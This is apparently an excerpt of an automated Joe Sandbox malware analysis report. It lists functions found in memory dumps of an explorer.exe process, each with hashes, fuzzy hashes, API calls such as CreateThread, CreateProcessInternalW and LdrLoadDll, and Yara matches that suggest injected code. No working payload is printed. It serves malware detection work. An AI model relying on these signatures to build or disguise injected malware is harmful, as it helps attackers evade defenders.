                  • Opcode ID: e51139722c97b769a80c8bd9e5d09a5e024b9728e4d297e9401cb76debb6455b
                  • Instruction ID: 1d6e084779e21815a03a26dfc4f137586ec306424a53a9c4a02c760836d6f4bd
                  • Opcode Fuzzy Hash: e51139722c97b769a80c8bd9e5d09a5e024b9728e4d297e9401cb76debb6455b
                  • Instruction Fuzzy Hash: 0990022630151003E1407158A45960A4015DBE1301F95D012E0414554CDD1589565222
                  Function 05012DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 35d1d8e7c2f2d632ae9fba217aa83944011d8b8bbe61613b37a87eaf5361af36
                  • Instruction ID: 5d5fa3e68724da8dcf39217ecedda7ed22710de830f555779d5edc46c10627d6
                  • Opcode Fuzzy Hash: 35d1d8e7c2f2d632ae9fba217aa83944011d8b8bbe61613b37a87eaf5361af36
                  • Instruction Fuzzy Hash: 12900226242551526545B158944550B40169BE02417D5C013A1414950C89269956D621
                  Function 05012DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ce39129ffd611ea90b6d2c4c1f8b3ac9e243c1b79ae370b7620f805d7defa91e
                  • Instruction ID: 2b154952098a8c3b25afb2f61ac5ac282df9d18ef3048d66fc9deb4d31a6bb60
                  • Opcode Fuzzy Hash: ce39129ffd611ea90b6d2c4c1f8b3ac9e243c1b79ae370b7620f805d7defa91e
                  • Instruction Fuzzy Hash: 0A90023620151413E1117158954570B00198BD0241FD5C413A0424558D9A568A52A121
                  Function 05012C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 0164a253fc18d4b248cc68815092e56f6b7b0dd8326c8456662303c6aee06ae0
                  • Instruction ID: 33f6bca52d63e1af130e9ff2aaed6bfea7386526c01a68aec7af872daaa7a708
                  • Opcode Fuzzy Hash: 0164a253fc18d4b248cc68815092e56f6b7b0dd8326c8456662303c6aee06ae0
                  • Instruction Fuzzy Hash: 7790023620151842E10071589445B4A00158BE0301F95C017A0124654D8A15C9517521
                  Function 05012C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: cdf9732a41807cb4fcb298dc67b1c68c253e82810e2aa542a933443c3338bff8
                  • Instruction ID: 6c303d607ef8a5cf13854fff66d430da7dc649a308d7df7f6b3651aed1eed925
                  • Opcode Fuzzy Hash: cdf9732a41807cb4fcb298dc67b1c68c253e82810e2aa542a933443c3338bff8
                  • Instruction Fuzzy Hash: 7590023620159802E1107158D44574E00158BD0301F99C412A4424658D8A9589917121
                  Function 05012CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7065fe7f38cee76aecfbd093b35a625e83709e9164b9d4b58b24771c7cfddd85
                  • Instruction ID: 1ad0f8c07602d85f7e793acdffd17503200b4fa9bd4bb8182facd57a57dc07e2
                  • Opcode Fuzzy Hash: 7065fe7f38cee76aecfbd093b35a625e83709e9164b9d4b58b24771c7cfddd85
                  • Instruction Fuzzy Hash: 0790023620151402E1007598A44964A00158BE0301F95D012A5024555ECA6589916131
                  Function 05012F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 0f2ae7e80385de261a9f5cd1607f5aa517048a604be5b7097621248c281f0f41
                  • Instruction ID: 2440d87ac2a820b45e72d50dad2e0d8f799aa80f32d9e2d0230b8f7171e2f00a
                  • Opcode Fuzzy Hash: 0f2ae7e80385de261a9f5cd1607f5aa517048a604be5b7097621248c281f0f41
                  • Instruction Fuzzy Hash: 4690026634151442E10071589455B0A0015CBE1301F95C016E1064554D8A19CD526126
                  Function 05012FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 64474def207667c8075acef5098065f9f7a736bc73bef1d3c00c6af12d4a0c33
                  • Instruction ID: 416b8e5d583ecc8ef3c9e7d451b815eca03ed6d612a01cfb23b6dbb0dea317fc
                  • Opcode Fuzzy Hash: 64474def207667c8075acef5098065f9f7a736bc73bef1d3c00c6af12d4a0c33
                  • Instruction Fuzzy Hash: 8B9002266015104251407168D88590A4015AFE1211795C122A0998550D895989655665
                  Function 05012FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5ac536fc2e9df6207c4527476b3ecb552cab8a1a5cbcab507164ac570cd0fbb4
                  • Instruction ID: f4e037c10e382e16a938a5088bd41ea6c092f607759900ae69a48d4e944d5520
                  • Opcode Fuzzy Hash: 5ac536fc2e9df6207c4527476b3ecb552cab8a1a5cbcab507164ac570cd0fbb4
                  • Instruction Fuzzy Hash: 55900226211D1042E20075689C55B0B00158BD0303F95C116A0154554CCD1589615521
                  Function 05012E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d9fe0be0307dcf11e3633c3f4ce64d59eecb1512e5bec849a940ab6788cd1b5e
                  • Instruction ID: fb55581f2226f0c74d65e64335064337a5f613fef5c5963dda740abd13168f98
                  • Opcode Fuzzy Hash: d9fe0be0307dcf11e3633c3f4ce64d59eecb1512e5bec849a940ab6788cd1b5e
                  • Instruction Fuzzy Hash: 3890022660151502E1017158944561A001A8BD0241FD5C023A1024555ECE258A92A131
                  Function 05012EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 4251b7625ca5e785a93481cb7433153aab5e6f1b2bd906ee2a4c0acde73448a1
                  • Instruction ID: 8a60a519ae54fe11859461a207db2814e05a22958ae8391f1dbf58e2a097d035
                  • Opcode Fuzzy Hash: 4251b7625ca5e785a93481cb7433153aab5e6f1b2bd906ee2a4c0acde73448a1
                  • Instruction Fuzzy Hash: A490026620191403E1407558984560B00158BD0302F95C012A2064555E8E298D516135
                  Function 05012B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 010b7026833eef15f02775362abd19bb23c7f750e341cc93b1d43b9b9ac7a804
                  • Instruction ID: 895028210dae2b8d2434671b78ae278ac299d61fb346a4d596c5c54ec8b1763a
                  • Opcode Fuzzy Hash: 010b7026833eef15f02775362abd19bb23c7f750e341cc93b1d43b9b9ac7a804
                  • Instruction Fuzzy Hash: 839002662025100351057158945561A401A8BE0201B95C022E1014590DC92589916125
                  Function 05012BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 2159a6f086126b9f769a98ed02bd40ce36fe07629d3aa693faaedd95ece65e95
                  • Instruction ID: fc738a76d39ba36a1558b046eea17cf832e6cfe38fbafe97f7d11f5f08a3bcb4
                  • Opcode Fuzzy Hash: 2159a6f086126b9f769a98ed02bd40ce36fe07629d3aa693faaedd95ece65e95
                  • Instruction Fuzzy Hash: 3E90023660551802E1507158945574A00158BD0301F95C012A0024654D8B558B5576A1
                  Function 05012BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: a583c0eb9595a56b03d407239e4b2b8607bda4e174b1fda87b932a2c6d534469
                  • Instruction ID: 825bb34983ee0bb1fe10e24d16944b3f822f3f01c06b557d0926874d944daffb
                  • Opcode Fuzzy Hash: a583c0eb9595a56b03d407239e4b2b8607bda4e174b1fda87b932a2c6d534469
                  • Instruction Fuzzy Hash: 5E90023620555842E14071589445A4A00258BD0305F95C012A0064694D9A258E55B661
                  Function 05012BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3a8cb86d0921b1e436e41b448f0472a3ae2e0574d06e769ddff240bf1684219d
                  • Instruction ID: 304631f5c28fce24f77cc6f82105bda6897afc9380e3d8c5a6a5226fbb3118f4
                  • Opcode Fuzzy Hash: 3a8cb86d0921b1e436e41b448f0472a3ae2e0574d06e769ddff240bf1684219d
                  • Instruction Fuzzy Hash: 3690023620151802E1807158944564E00158BD1301FD5C016A0025654DCE158B5977A1
                  Function 05012AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: e6eabccd4381a936839e65650382af6e11fe89b1f28641763965f83b4025886b
                  • Instruction ID: 10a676f7acba9947304bb8977130577b035ea6612232b849ac9b6a5fb341a650
                  • Opcode Fuzzy Hash: e6eabccd4381a936839e65650382af6e11fe89b1f28641763965f83b4025886b
                  • Instruction Fuzzy Hash: 4B90022A211510031105B558574550B00568BD5351395C022F1015550CDA2189615121
                  Function 05012AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7f2cb5963a27f10596b587cd4128078c4ce00c668e9fec5fd27c56d945177084
                  • Instruction ID: 139ee3ff127c57770c7cfaf9aaa1f666823bcfec16eacd5a839215cce8e397f5
                  • Opcode Fuzzy Hash: 7f2cb5963a27f10596b587cd4128078c4ce00c668e9fec5fd27c56d945177084
                  • Instruction Fuzzy Hash: FD90022A221510021145B558564550F04559BD63513D5C016F1416590CCA2189655321
                  Function 050135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 81b5211f1844a1d2689e5106e65798286d405b872eb7227c8fee7b05a8812b57
                  • Instruction ID: cc7892d7d8ce50fa54d0286c2a2753e8ef875087ec0140f5a5ce9f7eb40853f7
                  • Opcode Fuzzy Hash: 81b5211f1844a1d2689e5106e65798286d405b872eb7227c8fee7b05a8812b57
                  • Instruction Fuzzy Hash: 2290023660561402E1007158955570A10158BD0201FA5C412A0424568D8B958A5165A2
                  Function 050139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 42d4934e2a73ac71be9bef85a08a5834dfe81fb15361b39b8aa7e983e6f7964b
                  • Instruction ID: 996375723fe8f3957f06eb50848730554ff2d325a0a051c8ecf0dae74dbf4af0
                  • Opcode Fuzzy Hash: 42d4934e2a73ac71be9bef85a08a5834dfe81fb15361b39b8aa7e983e6f7964b
                  • Instruction Fuzzy Hash: 3C90022624556102E150715C944561A4015ABE0201F95C022A0814594D895589556221
                  Function 02F12C40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 02F12D0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 55945e212629cc3f5ec54b711cb3c1cd562df3402a9fd21a58b7566d1b49521a
                  • Instruction ID: 36bb83fcba4f1e04e337f0458072b45634b832aac10fcf735427308c5ca515b7
                  • Opcode Fuzzy Hash: 55945e212629cc3f5ec54b711cb3c1cd562df3402a9fd21a58b7566d1b49521a
                  • Instruction Fuzzy Hash: E8319EB1600305BBC714DFA4CC80FE7BBB9AB88744F40852DEA5A5B285D370B640CBA4
                  Function 02F0ECE5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 02F0ED07
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @J7<
                  • API String ID: 2538663250-2016760708
                  • Opcode ID: 037fd7493b7dff3fc44f4afd131df9020f0db340fd95d2e89f07f4e881ffed48
                  • Instruction ID: c7fc797ba60a359b2190e113dca13455e4f9feae0fd92e85a5707283fa2c19e6
                  • Opcode Fuzzy Hash: 037fd7493b7dff3fc44f4afd131df9020f0db340fd95d2e89f07f4e881ffed48
                  • Instruction Fuzzy Hash: BD3183B5A0060A9FDB00DFD8CC809EFB7B9FF88344B148559E616AB254D771EE01CBA0
                  Function 02F0ECF0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 02F0ED07
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Initialize
                  • String ID: @J7<
                  • API String ID: 2538663250-2016760708
                  • Opcode ID: d3e803316148bb9d42140f17e9504a8d414092d1d4e8c506fffd6cf3d3404eed
                  • Instruction ID: 341d970e25b1f92ad080f82107095ce0feffdd478cd4bfc8fee6d130e182e2b6
                  • Opcode Fuzzy Hash: d3e803316148bb9d42140f17e9504a8d414092d1d4e8c506fffd6cf3d3404eed
                  • Instruction Fuzzy Hash: BC3121B5A0060A9FDB10DFD8CC809EEB7B9FF88344B108559E616AB254D775EE05CBA0
                  Function 02F04600 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F04672
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: ecdf7e4bdfac5a167bbb19b0b9b4d889b177d5f5ebb8bc45ee1e268a5426d72b
                  • Instruction ID: a8f2df2554d01a08ce6990588a9713d4e78c1477e030f76e50b236acdfc99b2b
                  • Opcode Fuzzy Hash: ecdf7e4bdfac5a167bbb19b0b9b4d889b177d5f5ebb8bc45ee1e268a5426d72b
                  • Instruction Fuzzy Hash: AD011EB5D0020DABDF10DBE4DD85F9DB3799B54348F004195EA0897280F671E714DB91
                  Function 02F184E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F07EA3,00000010,?,?,?,00000044,?,00000010,02F07EA3,?,?,?), ref: 02F18543
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction ID: 35d23e5f09effb9b0b530c1d6df578a4f7b798f01a2b10b267ca85477772fb98
                  • Opcode Fuzzy Hash: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction Fuzzy Hash: 8F0192B2214609BBCB44DE99DC90EEB77ADAF8D754F408208BA0DE7241D630F8518BA4
                  Function 02EF9710 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EF9755
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: 07ad68c3462a9f191ada937ddd116eef23576dc1a65bf11af259040f8dab1104
                  • Instruction ID: 52eb02e73c0391e8194a85d430c78c8cecb5bc3516a18a43e69cd3b637314062
                  • Opcode Fuzzy Hash: 07ad68c3462a9f191ada937ddd116eef23576dc1a65bf11af259040f8dab1104
                  • Instruction Fuzzy Hash: A2F06D7338020836E62076A9EC02FDBB6DDDB80BA5F140425F70CEA2C0D992B5418AE9
                  Function 02EF970B Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EF9755
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
